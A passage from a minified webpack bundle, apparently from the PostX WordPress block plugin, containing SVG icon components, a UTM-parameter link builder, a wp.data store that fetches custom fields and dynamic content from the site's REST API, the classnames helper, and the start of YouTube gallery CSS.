381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 399)"}))),a.rocketPro=(0,o.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M10.7991 7.20004C9.69681 7.20004 8.7993 6.30253 8.7993 5.20024C8.7993 4.09795 9.69681 3.20044 10.7991 3.20044C11.9014 3.20044 12.7989 4.09795 12.7989 5.20024C12.7989 6.30253 11.9014 7.20004 10.7991 7.20004ZM10.7991 4.00036C10.1376 4.00036 9.59922 4.53871 9.59922 5.20024C9.59922 5.86177 10.1376 6.40012 10.7991 6.40012C11.4606 6.40012 11.999 5.86177 11.999 5.20024C11.999 4.53871 11.4606 4.00036 10.7991 4.00036ZM0.400132 15.9992C0.335857 15.9993 0.272494 15.984 0.215433 15.9544C0.158371 15.9248 0.109297 15.8819 0.0723848 15.8292C0.0354726 15.7766 0.0118133 15.7159 0.00341887 15.6521C-0.00497556 15.5884 0.00214312 15.5236 0.0241696 15.4632C1.25525 12.0788 2.54952 10.3621 3.87019 10.3621C4.30615 10.3621 4.7133 10.5493 5.08207 10.9173C5.66441 11.4996 5.68521 12.0796 5.60042 12.4635C5.33324 13.6698 3.62941 14.8513 0.536919 15.976C0.49303 15.9917 0.446764 15.9998 0.400132 16V15.9992ZM3.87099 11.1612C3.47503 11.1612 3.00867 11.5084 2.52312 12.1651C2.04557 12.8107 1.56562 13.7306 1.09286 14.9065C2.16076 14.4769 3.01907 14.041 3.65181 13.6066C4.50533 13.0203 4.7581 12.5667 4.81969 12.2899C4.88129 12.0132 4.7821 11.7484 4.51652 11.4828C4.30055 11.2668 4.08937 11.162 3.87019 11.162L3.87099 11.1612Z",fill:"white"}),(0,o.createElement)("path",{d:"M15.5986 0.00079992C13.5228 0.00079992 11.6734 0.352765 10.1 1.0471C8.80329 1.61984 7.693 2.42296 6.79949 3.43566C6.63311 3.62444 6.47872 3.81562 6.33554 4.0076C5.64601 4.05319 4.94048 4.32757 4.23655 4.82352C3.64061 5.24268 3.04227 5.82342 2.45673 6.54894C1.47282 7.76802 0.868084 8.9703 0.842486 9.0207C0.800011 9.10558 0.789106 9.2028 0.81172 9.29498C0.834335 9.38716 0.888995 9.4683 0.96593 9.52388C1.04287 9.57947 1.13706 9.60588 1.23168 9.5984C1.3263 9.59092 1.41518 9.55003 1.48242 9.48305C1.48642 9.47905 1.86878 9.10309 2.52072 8.73433C3.05826 8.43036 3.88698 8.07279 4.88928 8.0096C5.14286 8.65833 5.86838 9.43426 6.21635 9.78222C6.56431 10.1302 7.34024 10.8557 7.98897 11.1093C7.92578 12.1116 7.56821 12.9403 7.26425 13.4779C6.89468 14.1306 6.51952 14.5121 6.51632 14.5153C6.45032 14.5828 6.41026 14.6714 6.40318 14.7655C6.3961 14.8596 6.42247 14.9532 6.47763 15.0298C6.5328 15.1064 6.61322 15.1611 6.70473 15.1842C6.79625 15.2073 6.89297 15.1973 6.97787 15.1561C7.02827 15.1305 8.23055 14.5257 9.44963 13.5418C10.1752 12.9563 10.7559 12.358 11.1751 11.762C11.671 11.0573 11.9446 10.3526 11.991 9.66303C12.1822 9.52065 12.3733 9.36626 12.5629 9.19908C13.5756 8.30557 14.3787 7.19528 14.9515 5.89861C15.6458 4.32597 15.9978 2.47575 15.9978 0.39996V0H15.5978L15.5986 0.00079992ZM2.48552 7.84641C3.24785 6.74013 4.41333 5.36826 5.7268 4.93711C5.20765 5.84661 4.93888 6.68173 4.84209 7.21128C4.02236 7.26546 3.22145 7.48132 2.48552 7.84641ZM8.15376 13.5114C8.51883 12.7761 8.73444 11.9757 8.78809 11.1565C9.31684 11.0597 10.1528 10.7909 11.0615 10.2726C10.6295 11.5836 9.25845 12.7491 8.15296 13.5114H8.15376ZM12.0342 8.59994C10.3703 10.0678 8.64731 10.3998 8.39933 10.3998C8.39773 10.3998 8.23375 10.3966 7.79219 10.0854C7.48422 9.86861 7.12506 9.55984 6.78269 9.21748C6.44033 8.87511 6.13156 8.51595 5.91478 8.20798C5.60361 7.76642 5.60041 7.60244 5.60041 7.60084C5.60041 7.35286 5.93238 5.62984 7.40023 3.966C9.15686 1.9758 11.8454 0.887111 15.1947 0.806319C15.1139 4.15558 14.026 6.84411 12.035 8.60074L12.0342 8.59994Z",fill:"white"})),a.subtract=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.rightMark=(0,o.createElement)("svg",{width:"14",height:"11",viewBox:"0 0 14 11",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M1 5L5 9L13 1",stroke:"#5ECA70",strokeWidth:"1.5"})),a.plus=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),a.delete=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M18.2 6.5H16c-.4 0-.8-.3-1-.7l-.3-1c-.1-.4-.5-.7-1-.7h-3.5c-.4 0-.8.3-1 .7l-.2 1c-.1.4-.5.7-1 .7H5.8c-.5 0-.8.3-.8.7s.3.8.8.8h12.5c.4 0 .7-.3.7-.8s-.3-.7-.8-.7zM12.5 16.5c0 .3-.2.5-.5.5s-.5-.2-.5-.5V9H6l1.3 9.3c.1 1 1 1.7 2 1.7h5.5c1 0 1.8-.7 2-1.7L18 9h-5.5v7.5z"})),a.edit=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M19.3 18.1h-5.9c-.4 0-.8.3-.8.8s.3.8.8.8h5.9c.4 0 .8-.3.8-.8s-.4-.8-.8-.8zM16.2 11c1.5-1.9 1.5-2 1.6-2 .4-.6.5-1.2.3-1.9-.1-.7-.6-1.2-1.1-1.5 0 0-1.3-1-1.4-1.1-1.1-.9-2.7-.7-3.6.4l-7.7 9.6c-.3.4-.5 1.1-.3 1.7l.7 2.8c.1.3.4.6.7.6h3c.6 0 1.2-.3 1.6-.8 3.2-4.1 5.1-6.4 6.2-7.8zm-1.5-5.3s1.4 1.1 1.5 1.2c.2.1.4.4.5.6.1.3 0 .5-.1.7 0 .1-.4.6-1.1 1.3L12.3 7l.9-1.2c.4-.4 1-.5 1.5-.1zM8.8 17.8c-.1.1-.3.2-.5.2H5.9l-.5-2.2c0-.2 0-.4.1-.5l5.8-7.2 3.2 2.5c-1.7 2.2-4.1 5.3-5.7 7.2z"})),a.duplicate=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M11 9.75c-.69 0-1.25.56-1.25 1.25v9c0 .69.56 1.25 1.25 1.25h9c.69 0 1.25-.56 1.25-1.25v-9c0-.69-.56-1.25-1.25-1.25h-9ZM8.25 11A2.75 2.75 0 0 1 11 8.25h9A2.75 2.75 0 0 1 22.75 11v9A2.75 2.75 0 0 1 20 22.75h-9A2.75 2.75 0 0 1 8.25 20v-9Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M4 2.75A1.25 1.25 0 0 0 2.75 4v9A1.25 1.25 0 0 0 4 14.25h1a.75.75 0 0 1 0 1.5H4A2.75 2.75 0 0 1 1.25 13V4A2.75 2.75 0 0 1 4 1.25h9A2.75 2.75 0 0 1 15.75 4v1a.75.75 0 0 1-1.5 0V4A1.25 1.25 0 0 0 13 2.75H4Z",clipRule:"evenodd"})),a.tabLongArrowRight=(0,o.createElement)("svg",{width:"33",height:"8",viewBox:"0 0 33 8",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M32.8536 4.35355C33.0488 4.15829 33.0488 3.84171 32.8536 3.64645L29.6716 0.464466C29.4763 0.269204 29.1597 0.269204 28.9645 0.464466C28.7692 0.659728 28.7692 0.976311 28.9645 1.17157L31.7929 4L28.9645 6.82843C28.7692 7.02369 28.7692 7.34027 28.9645 7.53553C29.1597 7.7308 29.4763 7.7308 29.6716 7.53553L32.8536 4.35355ZM0.5 4V4.5H32.5V4V3.5H0.5V4Z",fill:"currentColor"})),a.saveLine=(0,o.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 8.66667L6.33333 12L13 4",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.rightAngle=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M17.9333 12.8C18.4667 12.4 18.4667 11.6 17.9333 11.2L8.6 4.2C7.94076 3.70557 7 4.17595 7 5V19C7 19.824 7.94076 20.2944 8.6 19.8L17.9333 12.8Z",fill:"currentColor"})),a.arrowRight=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 12H20M14 5L21 12L14 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.arrowLeft=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M21 12H4M10 5L3 12L10 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.fiveStar=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M9.18029 2.60415C9.5027 1.90962 10.4975 1.90962 10.8199 2.60415L12.6 6.43897C12.7314 6.72197 13.0016 6.91689 13.3134 6.95362L17.5362 7.45111C18.3006 7.54117 18.6078 8.47852 18.043 8.99753L14.9193 11.8678C14.6892 12.0792 14.5862 12.394 14.6473 12.6992L15.4762 16.8444C15.6261 17.5942 14.8215 18.1737 14.1496 17.7999L10.4414 15.7375C10.1673 15.585 9.83291 15.585 9.55876 15.7375L5.8506 17.7999C5.17864 18.1737 4.37404 17.5942 4.52397 16.8444L5.35289 12.6992C5.41393 12.394 5.31093 12.0792 5.08084 11.8678L1.95716 8.99753C1.39232 8.47852 1.69954 7.54117 2.464 7.45111L6.68675 6.95362C6.99858 6.91689 7.26875 6.72197 7.40012 6.43897L9.18029 2.60415Z",stroke:"currentColor",strokeWidth:"1.31579",strokeLinejoin:"round"})),a.knowledgeBase=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4.16667 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V7.35702C17.5 6.915 17.3244 6.49107 17.0118 6.17851L13.8215 2.98816C13.5089 2.67559 13.085 2.5 12.643 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V15.8333C2.5 16.7538 3.24619 17.5 4.16667 17.5Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.6665 7.5L9.99984 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.6665 10L13.3332 10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.6665 12.5L11.6665 12.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),a.commentCount2=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M16.6667 3.33325H3.33341C2.41294 3.33325 1.66675 4.07944 1.66675 4.99992V12.4999C1.66675 13.4204 2.41294 14.1666 3.33341 14.1666H7.08341V17.4999L11.2501 14.1666H16.6667C17.5872 14.1666 18.3334 13.4204 18.3334 12.4999V4.99992C18.3334 4.07944 17.5872 3.33325 16.6667 3.33325Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.66675 9.16659L6.66675 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M10 9.16659L10 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M13.3333 9.16659L13.3333 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),a.customerSupport=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4.1665 7.5C4.1665 4.73857 6.77818 2.5 9.99984 2.5C13.2215 2.5 15.8332 4.73857 15.8332 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M15.8333 14.1667V15.8334C15.8333 16.7539 15.0872 17.5001 14.1667 17.5001H10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M3.42064 7.99896L2.038 8.91951C1.80593 9.07401 1.6665 9.33434 1.6665 9.61317V12.0538C1.6665 12.3327 1.80593 12.593 2.038 12.7475L3.42064 13.6681C3.88395 13.9765 4.47696 14.0133 4.97485 13.7645C5.50087 13.5016 5.83317 12.964 5.83317 12.376V9.29101C5.83317 8.70301 5.50087 8.16542 4.97485 7.90253C4.47696 7.65369 3.88395 7.69048 3.42064 7.99896Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M15.0248 7.90253C15.5227 7.65369 16.1158 7.69048 16.579 7.99896L17.9617 8.91951C18.1938 9.07401 18.3332 9.33434 18.3332 9.61317V12.0538C18.3332 12.3327 18.1938 12.593 17.9617 12.7475L16.579 13.6681C16.1158 13.9765 15.5227 14.0133 15.0248 13.7645C14.4988 13.5016 14.1665 12.964 14.1665 12.376V9.29101C14.1665 8.70301 14.4988 8.16542 15.0248 7.90253Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),a.facebook=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4.16667 1.875C2.90101 1.875 1.875 2.90101 1.875 4.16667V15.8333C1.875 17.099 2.90101 18.125 4.16667 18.125H9.51011V12.2281H7.91667V9.86675H9.51011V8.84924C9.51011 6.2191 10.7004 5 13.2825 5C13.7721 5 14.6168 5.09601 14.9624 5.19201V7.33258C14.78 7.31338 14.4632 7.3038 14.0696 7.3038C12.8026 7.3038 12.313 7.78373 12.313 9.03161V9.86675H14.8371L14.4034 12.2281H12.313V18.125H15.8333C17.099 18.125 18.125 17.099 18.125 15.8333V4.16667C18.125 2.90101 17.099 1.875 15.8333 1.875H4.16667Z",fill:"currentColor"})),a.typography=(0,o.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("rect",{x:"2.5",y:"2.5",width:"15",height:"15",rx:"1.66667",stroke:"currentColor",strokeWidth:"1.25"}),(0,o.createElement)("path",{d:"M5.83203 7.91671V6.66671C5.83203 6.20647 6.20513 5.83337 6.66536 5.83337H13.332C13.7923 5.83337 14.1654 6.20647 14.1654 6.66671V7.91671M9.9987 5.83337V14.1667M7.91536 14.1667H12.082",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),a.reload=(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3.43552 16C4.90822 18.9634 7.96628 21 11.5 21C16.4706 21 20.5 16.9706 20.5 12C20.5 7.02944 16.4706 3 11.5 3C7.96628 3 4.90822 5.03656 3.43552 8M8.5 8.5H3V3",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.border=(0,o.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M8.33398 2.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.5 11.6666L2.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M8.33398 17.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M17.5 11.6666L17.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M5 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M5 17.5H4.16667C3.24619 17.5 2.5 16.7538 2.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M15 2.5H15.8333C16.7538 2.5 17.5 3.24619 17.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M15 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),a.boxShadow=(0,o.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("rect",{x:"2.5",y:"2.5",width:"12.5",height:"12.5",rx:"0.833333",stroke:"currentColor",strokeWidth:"1.25",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M15 5H16.6667C17.1269 5 17.5 5.3731 17.5 5.83333V6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M5 15V16.6667C5 17.1269 5.3731 17.5 5.83333 17.5H6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.5007 15.8333V16.6666C17.5007 17.1268 17.1276 17.4999 16.6673 17.4999H15.834",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8.75 17.5H10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12.291 17.5H13.7493",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.5 8.75V10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.5 12.2916V13.75",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}));const i=a},82044:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});const o={example:{source:"db-postx-featurename",medium:"block-feature",campaign:"postx-dashboard"},db_hellobar:{source:"db-postx-hellobar",medium:"summer-sale",campaign:"postx-dashboard"},explore_pro_feature:{source:"db-postx-wizard",medium:"explore-features",campaign:"postx-dashboard"},ticket_support:{source:"db-postx-wizard",medium:"ticket-support",campaign:"postx-dashboard"},postx_doc:{source:"db-postx-wizard",medium:"postx-doc",campaign:"postx-dashboard"},addons_popup:{source:"db-postx-addons",medium:"popup",campaign:"postx-dashboard"},builder_popup:{source:"db-postx-builder",medium:"popup-upgrade-pro",campaign:"postx-dashboard"},block_docs:{source:"db-postx-editor",medium:"block-docs",campaign:"postx-dashboard"},blockProFeat:{source:"db-postx-editor",medium:"pro-features",campaign:"postx-dashboard"},blockUpgrade:{source:"db-postx-editor",medium:"block-pro",campaign:"postx-dashboard"},blockPatternPro:{source:"db-postx-editor",medium:"blocks-premade",campaign:"postx-dashboard"},blockProLay:{source:"db-postx-editor",medium:"pro-layout",campaign:"postx-dashboard"},wizardPatternPro:{source:"db-postx-wizard",medium:"core_features-patterns",campaign:"postx-dashboard"},wizardStaterPackPro:{source:"db-postx-wizard",medium:"core_features-SP",campaign:"postx-dashboard"},slider_2:{source:"db-postx-editor",medium:"slider2-pro",campaign:"postx-dashboard"},advanced_search:{source:"db-postx-editor",medium:"adv_search-pro",campaign:"postx-dashboard"},customFont:{source:"db-postx-editor",medium:"custom-font",campaign:"postx-dashboard"},dc:{source:"db-postx-editor",medium:"acf-pro",campaign:"postx-dashboard"},postx_dashboard_settings:{source:"db-postx-setting",medium:"upgrade-pro-sidebar",campaign:"postx-dashboard"},postx_dashboard_tutorials:{source:"db-postx-tutorial",medium:"tutorials-upgrade_to_pro",campaign:"postx-dashboard"},postx_dashboard_tutorialsdocs:{source:"db-postx-tutorial",medium:"tutorials-doc",campaign:"postx-dashboard"},menu_save_temp_pro:{source:"db-postx-save-template",medium:"popup-upgrade",campaign:"postx-dashboard"},settingsFR:{source:"db-postx-setting",medium:"settings-upgrade-pro",campaign:"postx-dashboard"},tutorialsFR:{source:"db-postx-tutorial",medium:"tutorials-FR",campaign:"postx-dashboard"},editor_darklight:{source:"db-postx-editor",medium:"darklight-pro",campaign:"postx-dashboard"},final_hour_sale:{source:"db-postx-hellobar",medium:"final-hour-sale",campaign:"postx-dashboard"},massive_sale:{source:"db-postx-hellobar",medium:"massive-sale",campaign:"postx-dashboard"},flash_sale:{source:"db-postx-hellobar",medium:"flash-sale",campaign:"postx-dashboard"},exclusive_deals:{source:"db-postx-hellobar",medium:"exclusive-deals",campaign:"postx-dashboard"},black_friday_sale:{source:"db-postx-hellobar",medium:"black-friday",campaign:"postx-dashboard"},new_year_sale:{source:"db-postx-hellobar",medium:"new-year-sale",campaign:"postx-dashboard"}},a=e=>{const{url:t,utmKey:l,affiliate:a,hash:i}=e,n=new URL(t||"https://www.wpxpo.com/postx/"),r=o[l];return r&&(n.searchParams.set("utm_source",r.source),n.searchParams.set("utm_medium",r.medium),n.searchParams.set("utm_campaign",r.campaign)),a&&n.searchParams.set("ref",a),i&&(n.hash=i.startsWith("#")?i:`#${i}`),n.toString()}},30319:(e,t,l)=>{"use strict";l.d(t,{$6:()=>r,gH:()=>u}),l(87025);const{createReduxStore:o,register:a,controls:i}=wp.data,n={customFields:{options:{acfFields:[],acfMsg:"",mbFields:[],mbfMsg:"",podsFields:[],podsMsg:"",cMetaFields:[],cMetaMsg:""},hasResolved:!1,error:""},postTypes:[],cfValue:{},siteInfo:{},postInfo:{},authorInfo:{},link:{}},r="ultimate-post/store",s={setCustomFields:e=>({type:"SET_CF",customFields:e}),setCFValue:(e,t,l)=>({type:"SET_CF_VALUE",post_id:e,key:t,value:l}),setSiteInfo:(e,t)=>({type:"SET_SITE_INFO",key:e,value:t}),setPostInfo:(e,t,l)=>({type:"SET_POST_INFO",post_id:e,key:t,value:l}),setAuthorInfo:(e,t,l)=>({type:"SET_AUTHOR_INFO",post_id:e,key:t,value:l}),setPostTypes:e=>({type:"SET_POST_TYPES",postTypes:e}),setLink:(e,t,l)=>({type:"SET_LINK",post_id:e,key:t,value:l}),fetchFromAPI:e=>({type:"FETCH_FROM_API",options:e})},p={*getCustomFields(e={}){try{const t=yield s.fetchFromAPI({path:"ultp/v2/get_custom_fields",method:"POST",data:e});return s.setCustomFields({options:{acfFields:t.data.acf.fields||[],acfMsg:t.data.acf.message||"",cMetaFields:t.data.custom_metas.fields||[],cMetaMsg:t.data.custom_metas.message||"",mbFields:t.data.mb.fields||[],mbMsg:t.data.mb.message||"",podsFields:t.data.pods.fields||[],podsMsg:t.data.pods.message||""},hasResolved:!0,error:""})}catch(e){return s.setCustomFields({...n.customFields,error:e.message})}},*getCFValue(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"cf"}});return s.setCFValue(e,t,l.data)}catch(e){console.log(e)}},*getPostTypes(){try{const e=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{data_type:"post_types"}});return s.setPostTypes(e.data)}catch(e){console.log(e)}},*getSiteInfo(e){try{const t=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{key:e,data_type:"site_info"}});return s.setSiteInfo(e,t.data)}catch(e){console.log(e)}},*getLink(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"link"}});return s.setLink(e,t,l.data)}catch(e){console.log(e)}},*getPostInfo(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"post_info"}});return s.setPostInfo(e,t,l.data)}catch(e){console.log(e)}},*getAuthorInfo(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"author_info"}});return s.setAuthorInfo(e,t,l.data)}catch(e){console.log(e)}}},c={...i,FETCH_FROM_API:e=>wp.apiFetch(e.options)};a(o(r,{reducer:(e=n,t)=>{switch(t.type){case"SET_CF":return{...e,customFields:t.customFields};case"SET_CF_VALUE":return{...e,cfValue:{...e.cfValue,[t.post_id]:{...e.cfValue[t.post_id],[t.key]:t.value}}};case"SET_SITE_INFO":return{...e,siteInfo:{...e.siteInfo,[t.key]:t.value}};case"SET_POST_INFO":return{...e,postInfo:{...e.postInfo,[t.post_id]:{...e.postInfo[t.post_id],[t.key]:t.value}}};case"SET_AUTHOR_INFO":return{...e,authorInfo:{...e.authorInfo,[t.post_id]:{...e.authorInfo[t.post_id],[t.key]:t.value}}};case"SET_POST_TYPES":return{...e,postTypes:t.postTypes};case"SET_LINK":return{...e,link:{...e.link,[t.post_id]:{...e.link[t.post_id],[t.key]:t.value}}};default:return e}},actions:s,selectors:{getCustomFields:e=>e.customFields,getCFValue(e,t,l){var o;return null!==(o=e.cfValue?.[t]?.[l])&&void 0!==o?o:""},getSiteInfo(e,t){var l;return null!==(l=e.siteInfo?.[t])&&void 0!==l?l:""},getPostInfo(e,t,l){var o;return null!==(o=e.postInfo?.[t]?.[l])&&void 0!==o?o:""},getAuthorInfo(e,t,l){var o;return null!==(o=e.authorInfo?.[t]?.[l])&&void 0!==o?o:""},getPostTypes:e=>e.postTypes,getLink(e,t,l){var o;return null!==(o=e.link?.[t]?.[l])&&void 0!==o?o:""}},resolvers:p,controls:c}));const{invalidateResolution:u,invalidateResolutionForStoreSelector:d}=wp.data.dispatch(r)},94184:(e,t)=>{var l;!function(){"use strict";var o={}.hasOwnProperty;function a(){for(var e=[],t=0;t<arguments.length;t++){var l=arguments[t];if(l){var i=typeof l;if("string"===i||"number"===i)e.push(l);else if(Array.isArray(l)){if(l.length){var n=a.apply(null,l);n&&e.push(n)}}else if("object"===i){if(l.toString!==Object.prototype.toString&&!l.toString.toString().includes("[native code]")){e.push(l.toString());continue}for(var r in l)o.call(l,r)&&l[r]&&e.push(r)}}}return e.join(" ")}e.exports?(a.default=a,e.exports=a):void 0===(l=function(){return a}.apply(t,[]))||(e.exports=l)}()},38902:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.wp-block-ultimate-post-youtube-gallery{margin:0px !important;max-width:100%;margin:0 auto}.ultp-layout-classic>.ultp-ytg-item{position:relative}.ultp-layout-classic>.ultp-ytg-item:first-child{grid-column:1/-1}.ultp-layout-classic>.ultp-ytg-item:first-child .ultp-ytg-video{padding-bottom:0px !important;width:100%}.ultp-layout-classic>.ultp-ytg-item:first-child .ultp-ytg-video img{width:100%}.ultp-layout-classic.ultp-ytg-overlay>.ultp-ytg-item:first-child .ultp-ytg-video{max-width:100% !important}.ultp-layout-classic.ultp-ytg-overlay>.ultp-ytg-item:first-child .ultp-ytg-title{font-size:24px}.ultp-layout-classic.ultp-ytg-overlay>.ultp-ytg-item:first-child .ultp-ytg-description{font-size:14px;line-height:24px}.ultp-layout-classic.ultp-ytg-view-list>div:first-child{flex-direction:column}.ultp-layout-playlist{display:flex;gap:20px;flex-wrap:wrap;margin-bottom:20px;position:relative}.ultp-layout-playlist.ultp-ytg-playlist-sidebar{flex:1;max-width:calc(100% - var(--main-video-width, 65%) - 10px)}.ultp-layout-playlist .ultp-ytg-main{flex:2;min-width:0}.ultp-layout-playlist .ultp-ytg-playlist-sidebar{flex:1;min-width:300px;max-height:inherit}.ultp-layout-playlist 